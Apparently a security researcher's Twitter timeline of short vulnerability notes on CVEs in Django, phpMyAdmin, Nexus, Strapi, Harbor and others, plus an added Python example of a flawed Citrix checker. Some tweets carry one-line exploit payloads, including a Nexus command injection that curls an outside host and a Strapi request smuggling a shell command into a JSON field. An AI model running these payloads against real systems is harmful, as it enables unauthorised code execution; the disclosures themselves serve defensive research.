Tweets
Henry Chen 11 h
Citrix offers a tool to check CVE-2019-19781: if ("[global]") and ("encrypt passwords") and ("name resolve order") in str(response): => if True and True and ("name resolve order") in str(response): 🤔🤔🤔
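The operator-precedence slip quoted in the tweet above, shown as an added example (not part of the original tweet and not the vendor's tool): in Python a non-empty string literal is truthy, so only the last substring is actually tested and the check can report a match on a response that lacks the other markers. The sample response bodies and the function names are constructed for illustration.

```python
# Added illustration; response bodies below are constructed, not captured output.
MARKERS = ("[global]", "encrypt passwords", "name resolve order")

SAMPLES = {
    "all_markers": "[global]\n encrypt passwords = yes\n name resolve order = lmhosts host\n",
    "last_marker_only": "<html>Docs: see the 'name resolve order' option</html>",
    "first_two_only": "[global]\n encrypt passwords = yes\n",
    "no_markers": "<html>403 Forbidden</html>",
}


def flawed_check(response):
    """Condition as quoted in the tweet: `in` binds tighter than `and`, and the
    bare literals are always truthy, so only the last marker is tested."""
    return bool(("[global]") and ("encrypt passwords")
                and ("name resolve order") in str(response))


def strict_check(response):
    """Require every marker to be present in the response body."""
    body = str(response)
    return all(marker in body for marker in MARKERS)


def disagreements(samples):
    """Names of samples where the two checks give different verdicts."""
    return sorted(name for name, body in samples.items()
                  if flawed_check(body) != strict_check(body))


if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(f"{name:18} flawed={flawed_check(body)!s:5} strict={strict_check(body)}")
    print("disagree on:", disagreements(SAMPLES))
```
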
Henry Chen Feb 3
CVE-2020-7471: SQLI in Django: django.contrib.postgres.aggregates.StringAgg aggregation function was subject to SQL injection, using a suitably crafted delimiter. FIX:
Henry Chen Jan 16
CVE-2020-2551 WebLogic RCE via IIOP protocol.
Henry Chen Jan 16
Replying to @pyn3rd
;) Not enough work to keep me busy
Henry Chen Jan 15
Replying to @D0rkerDevil
Authenticated
Henry Chen Jan 15
CVE-2020-5504 SQLI in phpMyAdmin: A malicious user could inject custom SQL in place of their own username when creating queries to this page fix:
Henry Chen Jan 10
Found a "new" way to get JDBC Deserialization RCE, and it doesn't need any interceptor.
Henry Chen Jan 3
After digging deep into this commit you will find it's actually an XSS... more details: related issue:
Henry Chen Jan 2
CVE-2019-10758 post-auth Remote Code Execution in mongo-express < 0.54.0 via endpoints that use the `toBSON` method. However, there are lots of no-auth mongo-express ... shodan: poc:
Henry Chen Dec 29
Apereo Cas 4.2.X Remote Code Execution.(execution =xxx_ZXlKaGJH...):GIF👇 and about the Apereo Cas 4.1.X Remote Code Execution.(execution =xxx_AAAAIg...): Thanks
Henry Chen Dec 10
Henry Chen Dec 9
CVE-2019-15588 OS Command Injection in Nexus Repository Manager 2.x(bypass CVE-2019-5475) "createrepo" / "mergerepo" => /bin/bash -c curl${IFS}http://192.168.88.1:8000/ || /createrepo CVE-2019-15588 CVE-2019-5475
Henry Chen Dec 9
Replying to @700_isnuoT @test
👀?
Henry Chen Dec 8
Replying to @ZeddYu_Lu
👍
Henry Chen Dec 6
CVE-2019-19609 Strapi Framework Post-Auth RCE curl -H $'Authorization: Bearer [jwt]' ... --data {"plugin": "documentation && $(whoami > /tmp/whoami)","port":"1337"}
Henry Chen Dec 5
Replying to @0c0c0f
Henry Chen Dec 4
CVE-2019-3990 User Enumeration Vulnerability GET /api/users/search?email=.com => {"code":400,"message":"username is required"} GET /api/users/search?username=t => User Enumeration
Henry Chen Dec 4
Harbor Security Update: 1. Privilege Escalation 2. CVE-2019-19029 SQL Injection via user-groups 3. CVE-2019-19026 SQL Injection via project quotas 4. CVE-2019-19025 Missing CSRF protection 5. CVE-2019-3990 User Enumeration Vulnerability
Henry Chen Dec 4
CVE-2019-5096 GoAhead web server code execution vulnerability : An exploitable code execution vulnerability exists in the processing of multi-part/form-data requests within the base GoAhead web server application in versions v5.0.1, v.4.1.1 and v3.6.5.
Henry Chen Dec 2
CVE-2019-19118: Privilege escalation in the Django admin.